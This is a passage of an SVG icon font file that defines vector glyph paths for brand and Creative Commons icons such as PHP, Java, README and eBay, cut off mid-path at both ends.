d="M0 416h448v-448h-448v448zM358.4 236.8v89.6006h-268.801v-268.801h89.6006v89.6006h89.5996v89.5996h89.6006z" />
    <glyph glyph-name="hips" unicode="&#xf452;" horiz-adv-x="640" 
d="M251.6 290.4v-201.801c0 -1.89941 -0.899414 -2.7998 -2.7998 -2.7998h-40.8994c-1.60059 0 -2.7002 1.40039 -2.7002 2.7998v201.801c0 1.39941 1.09961 2.7998 2.7002 2.7998h40.8994c1.90039 0 2.7998 -0.900391 2.7998 -2.7998zM156.5 280
c18.7002 -13.5 28 -31.9004 28 -55.2998v-136.101c0 -1.89941 -0.900391 -2.7998 -2.7002 -2.7998h-27.2998c-9.09961 0 -16.4004 7.2998 -16.4004 16.2998v122.601c0 0.899414 2.7002 27 -45.7998 27c-48.5996 0 -45.7998 -26.2002 -45.7998 -27v-136.101
c0 -1.89941 -0.900391 -2.7998 -2.7998 -2.7998h-41c-1.7998 0 -2.7002 0.900391 -2.7002 2.7998v279.2c0 1.7998 0.900391 2.7002 2.7002 2.7002h40.8994c1.90039 0 2.80078 -0.900391 2.80078 -2.7002v-81.2002c15.1992 7.7002 31.6992 11.5 49.7998 11.4004
c24 -0.0996094 44.2002 -6.2002 60.2998 -18zM634.9 169.9c5.5 -12.6006 6.59961 -25.6006 3.09961 -39.1006c-9.59961 -36.8994 -44.9004 -45.5 -45.5996 -45.7998c-10.5 -3.09961 -23.6006 -4.2998 -36.3008 -4.2998c-16.5996 0 -32.5996 2.7002 -48.1992 8.2002
c-9.7002 3.39941 -14.6006 10.2998 -14.6006 20.6992v34.4004c0 2.09961 2.2998 3.7002 4.40039 2.2998c13.7002 -10.2002 34.0996 -19.0996 58.3994 -19.0996c23.3008 0 32.8008 4.5 36.5 13.5996c3 7.90039 -0.599609 16.1006 -12.1992 21.2002l-53.6006 23.5
c-21.3994 9.40039 -33.7998 24 -37.2002 43.5996c-5.69922 33.7002 22.2002 53.3008 22.7002 53.7002c13.2002 9.60059 32 15.4004 58.5 15.4004c19 0 37.4004 -3.2998 55.1006 -9.90039c1.2998 -0.5 1.89941 -1.2998 1.89941 -2.59961v-44.7002
c0 -2.09961 -2.2998 -3.40039 -4 -2.40039c-39.7002 20.7002 -76.5996 12.3008 -84 6.80078c-6.59961 -4.90039 -6 -12.5 2.60059 -16.1006l57.5996 -25.2998c16.5 -7.09961 28.0996 -18.4004 34.9004 -34.0996zM376.2 298.2c60.3994 0 108.7 -48.2998 108.6 -108.601
c0 -60.1992 -48.2002 -108.699 -108.7 -108.699c-21.8994 0 -41.1992 6.39941 -57.6992 19.0996v-88.7998c0 -1.7998 -0.900391 -2.7002 -2.80078 -2.7002h-40.8994c-2.10059 0 -2.7002 1.90039 -2.7002 2.7002v183.5c0 83.3994 72.5 103.5 104.2 103.5zM376.2 127.3
c34.8994 0 62.2998 27.9004 62.2002 62.2002c0 34.5996 -27.7002 62.2002 -62.2002 62.2002c-34.6006 0 -62.2002 -27.7002 -62.2002 -62.2002c0 -17.2002 6 -31.7998 18.2002 -44c12.0996 -12.0996 26.7998 -18.2002 44 -18.2002zM228.3 375.5
c15.9004 0 28.9004 -12.7002 28.9004 -28.9004c0 -15.7998 -12.7002 -28.8994 -28.9004 -28.8994s-28.8994 13.2998 -28.8994 28.8994c0.0996094 16 13 28.9004 28.8994 28.9004z" />
    <glyph glyph-name="php" unicode="&#xf457;" horiz-adv-x="640" 
d="M320 343.5c-171.3 0 -303.2 -72.2002 -303.2 -151.5s131.8 -151.5 303.2 -151.5c171.3 0 303.2 72.2002 303.2 151.5s-131.8 151.5 -303.2 151.5zM320 360.3c176.7 0 320 -75.2998 320 -168.3s-143.3 -168.3 -320 -168.3s-320 75.2998 -320 168.3s143.3 168.3 320 168.3z
M218.2 205.5c7.39941 38.4004 -18.4004 34.2998 -56.4004 34.2998l-13.7002 -70.5996c34.3008 0 62.2002 -4.2002 70.1006 36.2998zM97.4004 97.7002l32.6992 168.7h70.7002c21.2002 0 36.7998 -5.5 46.5 -16.7002c18.6006 -21.4004 11.7998 -64.1006 -14.2998 -88.1006
c-23.5996 -22.0996 -49.0996 -19.0996 -90.2002 -19.0996l-8.7002 -44.7998h-36.6992zM283.1 311.3h36.5l-8.69922 -44.7998c31.5 0 60.6992 2.2998 74.7998 -10.7002c14.7998 -13.5996 7.7002 -31 -8.2998 -113.1h-37c15.3994 79.3994 18.2998 86 12.6992 92
c-5.39941 5.7998 -17.6992 4.59961 -47.3994 4.59961l-18.7998 -96.5996h-36.5zM505 205.5c7.40039 38.4004 -18.2002 34.2998 -56.4004 34.2998l-13.6992 -70.5996c33.3994 0 62.0996 -4.7998 70.0996 36.2998zM384.2 97.7002l32.7998 168.7h70.7002
c21.2002 0 36.7998 -5.5 46.5 -16.7002c18.5996 -21.4004 11.7998 -64.1006 -14.2998 -88.1006c-23.1006 -21.5996 -47 -19.0996 -90.2002 -19.0996l-8.7002 -44.7998h-36.7998z" />
    <glyph glyph-name="quinscape" unicode="&#xf459;" horiz-adv-x="489" 
d="M301.6 -26.5996c4.40039 -4.40039 8.10059 -9 13.3008 -12.5c-22.6006 -6.90039 -45.6006 -10.1006 -70.4004 -10.1006c-135 0 -244.5 109.5 -244.5 244.601c0 135.1 109.5 244.6 244.5 244.6c135.1 0 244.6 -109.5 244.6 -244.6
c0 -35.3008 -6.89941 -67.4004 -20.2998 -97.7002c-3 5.7002 -7.2002 10.2002 -11.2002 15.2998c11.2002 93.5 -62.0996 176.6 -157 176.6c-87.2998 0 -158.1 -70.7998 -158.1 -158.1s70.7998 -158.1 158.1 -158.1h1zM301.5 -26.5c0 0 0.0996094 -0.0996094 0 0
l0.400391 -0.0996094zM379.9 142.4c54.7998 0 99.1992 -44.4004 99.1992 -99.2002s-44.3994 -99.2002 -99.1992 -99.2002c-54.8008 0 -99.2002 44.4004 -99.2002 99.2002s44.3994 99.2002 99.2002 99.2002z" />
    <glyph glyph-name="readme" unicode="&#xf4d5;" horiz-adv-x="576" 
d="M528.3 401.5c26.4004 -0.200195 47.7002 -21.7002 47.7002 -48.0996v-245.7c0 -26.5 -21.5 -48 -48 -48h-89.7002c-102.1 0 -132.6 -24.4004 -147.3 -75c-0.799805 -2.7998 -5.2998 -2.7998 -6 0c-14.5996 50.5996 -45.0996 75 -147.3 75h-89.7002
c-26.5 0 -48 21.5 -48 48v245.8c0 26.5 21.5 48 48 48h139.7c48.0996 0 89.7998 -33.2998 100.399 -80.2998c10.5 47 52.3008 80.2998 100.4 80.2998h139.8zM242 136.1h0.0996094v22.9004c0 2 -1.59961 3.5 -3.5 3.5h-160.399c-2 0 -3.5 -1.59961 -3.5 -3.5v-22.9004
c0 -2 1.59961 -3.5 3.5 -3.5h160.3c2 0 3.5 1.60059 3.5 3.5zM242 197h0.0996094v22.9004c0 2 -1.59961 3.5 -3.5 3.5h-160.399c-2 0 -3.5 -1.60059 -3.5 -3.5v-22.9004c0 -2 1.59961 -3.5 3.5 -3.5h160.3c2 0 3.5 1.59961 3.5 3.5zM242 257.9h0.0996094v22.8994
c0 2 -1.59961 3.5 -3.5 3.5h-160.399c-2 0 -3.5 -1.59961 -3.5 -3.5v-22.8994c0 -2 1.59961 -3.5 3.5 -3.5h160.3c2 0 3.5 1.59961 3.5 3.5zM501.3 136.2h0.100586v22.8994c0 2 -1.60059 3.5 -3.5 3.5h-160.4c-2 0 -3.5 -1.59961 -3.5 -3.5v-22.8994
c0 -2 1.59961 -3.5 3.5 -3.5h160.3c2 0 3.5 1.59961 3.5 3.5zM501.3 197.1h0.100586v22.9004c0 2 -1.60059 3.5 -3.5 3.5h-160.4c-2 0 -3.5 -1.59961 -3.5 -3.5v-22.9004c0 -2 1.59961 -3.5 3.5 -3.5h160.3c2 0 3.5 1.60059 3.5 3.5zM501.3 258h0.100586v22.7998
c0 2 -1.60059 3.5 -3.5 3.5h-160.4c-2 0 -3.5 -1.59961 -3.5 -3.5v-22.7998c0 -2 1.59961 -3.5 3.5 -3.5h160.3c2 0 3.5 1.59961 3.5 3.5z" />
    <glyph glyph-name="java" unicode="&#xf4e4;" horiz-adv-x="377" 
d="M274.9 135.1c-94.5 -24.8994 -277 -13.2998 -224.5 12.1006c44.5 21.3994 80.5996 19 80.5996 19s-93.0996 -22.1006 -33 -30.1006c25.4004 -3.39941 76 -2.59961 123.1 1.30078c38.5 3.19922 77.2002 10.1992 77.2002 10.1992s-13.5996 -5.7998 -23.3994 -12.5z
M189.5 167.2c-48.5 43.7998 -84.0996 82.2998 -60.2002 118.2c35.1006 52.5 132.2 78.0996 110.7 162.6c0 0 53.2002 -53.2002 -50.5 -135c-83.0996 -65.5996 -19 -103.1 0 -145.8zM304.1 343.4c-111.6 -64.7002 -91 -83.5 -64.0996 -121.301
c28.7998 -40.5 -33.9004 -72.8994 -33.9004 -72.8994s31.2002 25.5996 6.5 54c-83.6992 96.3994 91.6006 140.2 91.5 140.2zM298 72.9004c96.0996 49.8994 51.5996 97.8994 20.5996 91.3994c-7.59961 -1.59961 -11 -3 -11 -3s2.80078 4.40039 8.2002 6.2998
c61.2998 21.6006 108.5 -63.5996 -19.7998 -97.2998c0 0.100586 1.5 1.40039 2 2.60059zM345.2 10.5996c53 -23.8994 -115.2 -72 -319.4 -38.7998c-74.8994 12.1006 36.1006 54.5 56.4004 40.2002c0 0 -6.5 0.400391 -17.7002 -2
c-10.7998 -2.2998 -45.0996 -13.4004 -26.7998 -21.2998c50.7998 -22.1006 233.7 -16.7998 291.6 0.700195c30.4004 9.2998 15.9004 21.1992 15.9004 21.1992zM121.6 52c0 0 -19.5996 -11.4004 13.9004 -15.2002c40.5996 -4.59961 61.2998 -4 106 4.5
c0 0 11.7998 -7.39941 28.2002 -13.7998c-100.2 -42.9004 -226.8 2.5 -148.101 24.5zM301.4 -45.2002c69.7998 13.2002 76.1992 29.7002 76.1992 29.7002c-3.2998 -43.5996 -144.899 -52.7998 -237.1 -46.9004c-60.5996 3.90039 -72.4004 13.7002 -72.4004 13.6006
c57.5 -9.5 154.601 -11.2002 233.301 3.59961zM257.8 95c0 0 8.2002 -8.2998 21.1006 -12.7998c-121.301 -35.5 -256.301 -2.90039 -169.5 25.8994c0 0 -21.9004 -16.1992 11.5996 -19.6992c43.2998 -4.5 77.5996 -4.80078 136.8 6.59961z" />
    <glyph glyph-name="pied-piper-hat" unicode="&#xf4e5;" horiz-adv-x="640" 
d="M640 423.1c-80.7998 -53.5996 -89.4004 -92.5 -96.4004 -104.399c-6.69922 -12.2002 -11.6992 -60.2998 -23.2998 -83.6006c-11.7002 -23.5996 -54.2002 -42.1992 -66.0996 -50c-11.7002 -7.7998 -28.2998 -38.0996 -41.9004 -64.1992
c-108.1 4.39941 -167.399 -38.8008 -259.2 -93.6006c29.4004 9.7002 43.3008 16.7002 43.3008 16.7002c94.1992 36 139.3 68.2998 281.1 49.2002c1.09961 0 1.90039 -0.600586 2.7998 -0.799805c3.90039 -2.2002 5.2998 -6.90039 3.10059 -10.8008l-53.9004 -95.7998
c-2.5 -4.7002 -7.7998 -7.2002 -13.0996 -6.09961c-126.801 23.7998 -226.9 -17.2998 -318.9 -18.6006c-73.4004 -1.09961 -97.5 33.5 -97.5 35.1006c0 1.09961 0.599609 1.7002 1.7002 1.7002c0 0 38.2998 0 103.1 15.2998c73.6006 140.3 139.2 189.399 210.601 189.399
c0 0 71.6992 0 90.5996 -61.8994c22.7998 39.7002 28.2998 49.2002 28.2998 49.2002c5.2998 9.39941 35 77.1992 86.4004 141.399c51.5 64 90.3994 79.9004 119.3 91.7998z" />
    <glyph glyph-name="creative-commons-by" unicode="&#xf4e7;" horiz-adv-x="496" 
d="M314.9 253.6v-101.399h-28.3008v-120.5h-77.0996v120.399h-28.2998v101.5c0 4.40039 1.59961 8.2002 4.59961 11.3008c3.10059 3.09961 6.90039 4.69922 11.2998 4.69922h101.9c4.09961 0 7.7998 -1.59961 11.0996 -4.69922
c3.10059 -3.2002 4.80078 -6.90039 4.80078 -11.3008zM213.4 317.3c0 23.2998 11.5 35 34.5 35s34.5 -11.7002 34.5 -35c0 -23 -11.5 -34.5 -34.5 -34.5s-34.5 11.5 -34.5 34.5zM247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248
c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3z" />
    <glyph glyph-name="creative-commons-nc" unicode="&#xf4e8;" horiz-adv-x="496" 
d="M247.6 440c139.801 0 248.4 -107.9 248.4 -248c0 -147.2 -118.5 -248 -248.4 -248c-134.5 0 -247.6 110.8 -247.6 248c0 132.9 104.7 248 247.6 248zM55.7998 258.9c-7.39941 -20.4004 -11.0996 -42.7002 -11.0996 -66.9004c0 -110.9 92.0996 -202.4 203.7 -202.4
c122.399 0 177.199 101.801 178.5 104.101l-93.4004 41.5996c-7.7002 -37.0996 -41.2002 -53 -68.2002 -55.3994v-38.1006h-28.7998v38.2002c-27.5 0.299805 -52.5996 10.2002 -75.2998 29.7002l34.0996 34.5c31.7002 -29.4004 86.4004 -31.7998 86.4004 2.2002
c0 6.19922 -2.2002 11.1992 -6.60059 15.0996c-14.1992 6 -1.7998 0.0996094 -219.3 97.4004zM248.4 395.7c-38.4004 0 -112.4 -8.7002 -170.5 -93l94.7998 -42.5c10 31.2998 40.3994 42.8994 63.7998 44.2998v38.0996h28.7998v-38.0996
c22.7002 -1.2002 43.4004 -8.90039 62 -23l-32.2998 -33.2002c-42.7002 29.9004 -83.5 8 -70 -11.0996c53.4004 -24.1006 43.7998 -19.7998 93 -41.6006l127.1 -56.6992c4.10059 17.3994 6.2002 35.0996 6.2002 53.0996c0 57 -19.7998 105 -59.2998 143.9
c-39.2998 39.8994 -87.2002 59.7998 -143.6 59.7998z" />
    <glyph glyph-name="creative-commons-nc-eu" unicode="&#xf4e9;" horiz-adv-x="496" 
d="M247.7 440c140.7 0 248.3 -109 248.3 -248c0 -147.1 -118.1 -248 -248.3 -248c-136 0 -247.7 111.7 -247.7 248c0 131.2 103.6 248 247.7 248zM248.3 -10.7002c122.601 0 177.3 102.2 178.8 104.3l-128.3 56.8008h-90.2998
c9.2002 -39.3008 39.0996 -50.2002 67.2998 -50.2002c19.1006 0 38.6006 6.2002 47.2998 10.7998l10 -46.0996c-14.1992 -7.90039 -38.1992 -15.8008 -64.7998 -15.8008c-57.3994 0 -113.2 34.3008 -124.6 101.301h-27v29.5h22.7998
c0 16.2998 0.400391 13.2998 0.400391 19.5h-23.3008v29.5h4.7002l-65.7002 29.0996c-7.19922 -20.7998 -10.8994 -42.7998 -10.8994 -66c0 -110.2 91.5996 -202.7 203.6 -202.7zM231.6 179.9l-0.5 0.399414l0.900391 -0.399414h-0.400391zM308.8 199.4l136.101 -60.5
c4.19922 16.5996 6.2998 34.1992 6.2998 52.8994c0 113.2 -90 203.4 -203 203.4c-13 0 -106.101 3.2002 -170.7 -93.6006l81.5996 -36.0996c4.10059 7.2002 8.60059 14 13.9004 20.0996c23.7002 26.5 56.9004 42.3008 95.9004 42.3008
c25.2998 0 47.2998 -5.80078 62.2998 -12.4004l-11.6006 -47.2998c-10.7998 4.59961 -27.7998 10 -46.0996 10c-20 0 -38.2002 -6.60059 -51.0996 -22.4004c-3.40039 -3.7998 -6.30078 -8.7998 -8.80078 -14.2998l28.6006 -12.5996h70.2998v-29.5h-3.7002z" />
    <glyph glyph-name="creative-commons-nc-jp" unicode="&#xf4ea;" horiz-adv-x="496" 
d="M247.7 440c140.8 0 248.3 -109.2 248.3 -248c0 -147.2 -118.1 -248 -248.3 -248c-135.9 0 -247.7 111.6 -247.7 248c0 131.2 103.6 248 247.7 248zM248.3 -10.7002c118.101 0 173.7 96.1006 175.2 98.2998l-81 36.1006v-35.7002h-64.2002v-56h-61.7002v56h-63.7998
v38.7002h63.7998v18.7002l-5.69922 11.7998h-58.1006v38.5996h27.9004l-127 56.5c-6 -19.0996 -9 -39.2002 -9 -60.2998c0 -110.2 91.5996 -202.7 203.6 -202.7zM335.9 126.6l-54.7002 24.3008l-2.90039 -5.60059v-18.7002h57.6006zM342.4 178l101 -45.0996
c5.19922 18.3994 7.89941 38 7.89941 59c0 113.399 -90.2002 203.399 -203 203.399c-91.0996 0 -145.899 -54 -173.7 -98.0996l81.9004 -36.5l-27.2998 51h65.7998l39.5996 -85.7002l23 -10.2002l43.4004 96h65.7998l-63 -116h38.6006v-17.7998z" />
    <glyph glyph-name="creative-commons-nd" unicode="&#xf4eb;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM342.4 251v-42.5h-180.301v42.5h180.301zM342.4 171.2v-42.5h-180.301v42.5h180.301z" />
    <glyph glyph-name="creative-commons-pd" unicode="&#xf4ec;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111.1 248 -248c0 -137 -111 -248 -248 -248s-248 111 -248 248c0 136.9 111 248 248 248zM248 -9.5c76.0996 0 142.4 42.4004 176.7 104.8c-1.40039 0.299805 12.5 -5.7998 -217.9 96.7998c0.200195 -32 16.1006 -71.8994 53.9004 -71.8994
c18.7002 0 30.7998 10.3994 36.2998 16.7002l36.0996 -43.9004c-25.8994 -22.7998 -56.5 -29.5 -79.3994 -29.5c-46.5 0 -120.4 27.9004 -120.4 126.9c0 11.3994 1.2002 22.3994 3.2998 32.8994l-78.7998 35.1006c-45.5996 -129.9 51 -267.9 190.2 -267.9zM442.2 140.5
c0.200195 -0.200195 0.299805 -0.299805 0.599609 -0.400391c4.40039 16.6006 6.7998 34 6.7998 52c0 111.101 -90.3994 201.5 -201.5 201.5c-70.3994 0 -132.399 -36.2998 -168.5 -91.1992l74.9004 -33.4004c19.7998 31.0996 53.2998 51.5996 100.7 51.5996
c20.0996 0 51 -4.19922 78.0996 -27.5l-40.3994 -41.5996c-19.8008 19.7002 -55.9004 23 -74.7002 -11z" />
    <glyph glyph-name="creative-commons-pd-alt" unicode="&#xf4ed;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 -10.7998c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3
c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8zM316.7 262c21.3994 0 70 -5.2002 70 -68.5996c0 -63.5 -48.6006 -68.6006 -70 -68.6006h-53.2002v137.2h53.2002zM317.5 153.5c24 0 34.5 15.2998 34.5 39.9004
c0 42 -31.2002 39.8994 -35 39.8994l-19.4004 -0.0996094v-79.7002h19.9004zM203.7 262c33.7002 0 50.5 -15.5 50.5 -46.5c0 -9 -3 -46.5 -57.1006 -46.5h-27v-44.2998h-34.5996v137.3h68.2002zM198.8 194.7c27.9004 0 30 41.5996 -0.899414 41.5996h-28.3008v-41.5996
h29.2002z" />
    <glyph glyph-name="creative-commons-remix" unicode="&#xf4ee;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM410.1 187.6l4.90039 -2.19922v-70c-7.2002 -3.60059 -63.4004 -27.5 -67.2998 -28.8008c-6.5 1.80078 -113.7 46.8008 -137.3 56.2002l-64.2002 -26.5996l-63.2998 27.5v63.7998
l59.2998 24.7998c-0.700195 0.700195 -0.400391 -5 -0.400391 70.4004l67.2998 29.7002l151.9 -62.9004v-61.5996zM339.7 106.1v43.8008h-0.400391v1.7998l-113.8 46.5v-45.2002l113.8 -46.9004v0.400391zM347.2 163.7l39.8994 16.3994l-36.7998 15.5l-39 -16.3994z
M399.5 125.6v43l-44.2998 -18.5996v-43.4004z" />
    <glyph glyph-name="creative-commons-sa" unicode="&#xf4ef;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM137.7 227c13 83.9004 80.5 95.7002 108.899 95.7002c99.8008 0 127.5 -82.5 127.5 -134.2c0 -63.5996 -41 -132.9 -128.899 -132.9c-38.9004 0 -99.1006 20 -109.4 97h62.5
c1.5 -30.0996 19.6006 -45.1992 54.5 -45.1992c23.2998 0 58 18.1992 58 82.7998c0 82.5 -49.0996 80.5996 -56.7002 80.5996c-33.0996 0 -51.6992 -14.5996 -55.7998 -43.7998h18.2002l-49.2002 -49.2002l-49 49.2002h19.4004z" />
    <glyph glyph-name="creative-commons-sampling" unicode="&#xf4f0;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM252 342.1c2.7998 0.300781 11.5 -1 11.5 -11.5l6.59961 -107.199l4.90039 59.2998c0 6 4.7002 10.5996 10.5996 10.5996c5.90039 0 10.6006 -4.7002 10.6006 -10.5996
c0 -2.5 -0.5 5.7002 5.7002 -81.5l5.7998 64.2002c0.299805 2.89941 2.89941 9.2998 10.2002 9.2998c3.7998 0 9.89941 -2.2998 10.5996 -8.90039l11.5 -96.5l5.2998 12.7998c1.7998 4.40039 5.2002 6.60059 10.2002 6.60059h58v-21.2998h-50.9004l-18.1992 -44.3008
c-3.90039 -9.89941 -19.5 -9.09961 -20.8008 3.10059l-4 31.8994l-7.5 -92.5996c-0.299805 -3 -3 -9.2998 -10.1992 -9.2998c-3 0 -9.80078 2.09961 -10.6006 9.2998c0 1.90039 0.600586 -5.7998 -6.2002 77.9004l-5.2998 -72.2002
c-1.09961 -4.7998 -4.7998 -9.2998 -10.5996 -9.2998c-2.90039 0 -9.7998 2 -10.6006 9.2998c0 1.89941 0.5 -6.7002 -5.7998 87.7002l-5.7998 -94.8008c0 -6.2998 -3.59961 -12.3994 -10.5996 -12.3994c-5.2002 0 -10.6006 4.09961 -10.6006 12l-5.7998 87.7002
c-5.7998 -92.5 -5.2998 -84 -5.2998 -85.9004c-1.10059 -4.7998 -4.7998 -9.2998 -10.6006 -9.2998c-3 0 -9.7998 2.09961 -10.5996 9.2998c0 0.700195 -0.400391 1.09961 -0.400391 2.59961l-6.19922 88.6006l-4.90039 -56.7002
c-0.700195 -6.5 -6.7002 -9.2998 -10.5996 -9.2998c-5.80078 0 -9.60059 4.09961 -10.6006 8.89941l-11.0996 76.4004c-2 -4 -3.5 -8.40039 -11.1006 -8.40039h-51.3994v21.3008h44.7998l13.7002 27.8994c4.39941 9.90039 18.2002 7.2002 19.8994 -2.7002l3.10059 -20.3994
l8.39941 97.8994c0 6 4.80078 10.6006 10.6006 10.6006c0.5 0 10.5996 0.200195 10.5996 -12.4004l4.90039 -69.0996l6.59961 92.5996c0 10.1006 9.5 10.6006 10.2002 10.6006c0.599609 0 10.5996 -0.700195 10.5996 -10.6006l5.30078 -80.5996l6.19922 97.8994
c0.100586 1.10059 -0.599609 10.3008 9.90039 11.5z" />
    <glyph glyph-name="creative-commons-sampling-plus" unicode="&#xf4f1;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM355.4 189.7l58.3994 0.299805v-23.2002h-50.5l-18 -43.3994c-4.59961 -11 -20.8994 -8.7002 -22.2998 3.09961l-2.7002 22.2998l-6.7998 -83
c-1.09961 -14.0996 -22 -14.2002 -23.0996 0.100586l-4.90039 64.3994l-4.59961 -58.5996c-1.10059 -14.2998 -22.3008 -14.1006 -23.2002 0.200195l-4.5 71.7998l-4.90039 -80.5c-0.899414 -14.5 -22.2998 -14.5 -23.2002 -0.100586l-4.7998 73.3008l-4.59961 -70.4004
c-0.900391 -14.2998 -22.1006 -14.5 -23.2002 -0.0996094l-5.7002 78.2998l-3.7998 -43.6006c-1.2002 -13.6992 -21.0996 -14.1992 -23.0996 -0.699219l-10.7002 73.0996c-2 -3.90039 -6 -6.40039 -10.4004 -6.40039h-51.2998v23.2002h43.9004l13.1992 27.7002
c4.90039 10.2998 20.3008 8.09961 22 -3.2998l1.80078 -12.2002l7.69922 89.7998c1.2002 14.1006 22.1006 14.1006 23.2002 -0.200195l4.10059 -57l5.2998 80.2002c1 14.4004 22.2998 14.4004 23.2002 0l4.2998 -66.2998l5.09961 83.7002
c0.900391 14.3994 22.2998 14.5 23.2002 0l5.90039 -94.2998l3.5 44.8994c1.09961 14.2002 22.0996 14.2998 23.1992 0l5.2002 -68.7998l4.2998 51.4004c1.10059 13.7998 21.4004 14.2998 23.1006 0.399414l11 -92.7998l4 9.5c1.7002 4.40039 6 7.2002 10.7002 7.2002z
M277.4 184.5c4.09961 0 7.5 3.40039 7.5 7.5c0 4.2002 -3.40039 7.5 -7.5 7.5h-21.9004v21.9004c0 4.19922 -3.40039 7.5 -7.5 7.5s-7.5 -3.40039 -7.5 -7.5v-21.9004h-21.9004c-4.09961 0 -7.5 -3.40039 -7.5 -7.5c0 -4.2002 3.40039 -7.5 7.5 -7.5h21.9004v-21.9004
c0 -4.19922 3.40039 -7.5 7.5 -7.5c4.2002 0 7.5 3.40039 7.5 7.5v21.9004h21.9004z" />
    <glyph glyph-name="creative-commons-share" unicode="&#xf4f2;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM349.4 262.9c7.7998 0 13.6992 -6.10059 13.6992 -13.7002v-182.5c0 -7.7002 -6.09961 -13.7002 -13.6992 -13.7002h-135.101c-7.7002 0 -13.7002 6 -13.7002 13.7002v54h-54
c-7.7998 0 -13.6992 6 -13.6992 13.7002v182.5c0 8.19922 6.59961 12.6992 12.3994 13.6992h136.4c7.7002 0 13.7002 -6 13.7002 -13.6992v-54h54zM159.9 147.7h40.6992v101.399c0 7.40039 5.80078 12.6006 12 13.7002h55.8008v40.2998h-108.5v-155.399zM336.1 235.8h-108.5
v-155.399h108.5v155.399z" />
    <glyph glyph-name="creative-commons-zero" unicode="&#xf4f3;" horiz-adv-x="496" 
d="M247.6 440c141.801 0 248.4 -110.1 248.4 -248c0 -147.1 -118.5 -248 -248.4 -248c-134 0 -247.6 109.5 -247.6 248c0 132.9 104.7 248 247.6 248zM248.4 395.3c-118.2 0 -203.7 -97.8994 -203.7 -203.3c0 -109.8 91.2002 -202.8 203.7 -202.8
c103.199 0 202.8 81.0996 202.8 202.8c0.0996094 113.8 -90.2002 203.3 -202.8 203.3zM248 334.8c81.9004 0 102.5 -77.2998 102.5 -142.8s-20.5996 -142.8 -102.5 -142.8s-102.5 77.2998 -102.5 142.8s20.5996 142.8 102.5 142.8zM248 280.9
c-42.0996 0 -44.0996 -60.1006 -44.0996 -88.9004c0 -9.2998 0.199219 -21.7002 1.89941 -34.4004l54.5 100.2c5.7002 9.7998 2.7998 16.7998 -3.09961 21.9004c-2.7998 0.700195 -5.90039 1.2002 -9.2002 1.2002zM288.8 234.7l-60.8994 -105.2
c-12.5 -18.7002 6.59961 -26.4004 20.0996 -26.4004c42.0996 0 44.0996 60 44.0996 88.9004c0 11.2998 -0.399414 27.2998 -3.2998 42.7002z" />
    <glyph glyph-name="ebay" unicode="&#xf4f4;" horiz-adv-x="640" 
d="M606 258.5h34l-99.2002 -194.8h-35.8994l28.5 54.0996l-61.5 116.101c3.09961 -6.60059 4.7998 -14.5 4.7998 -23.8008v-65.5996c0 -9.2998 0.299805 -18.5996 1 -26.7998h-29.7998c-0.800781 6.89941 -1.10059 13.5996 -1.10059 20.2002
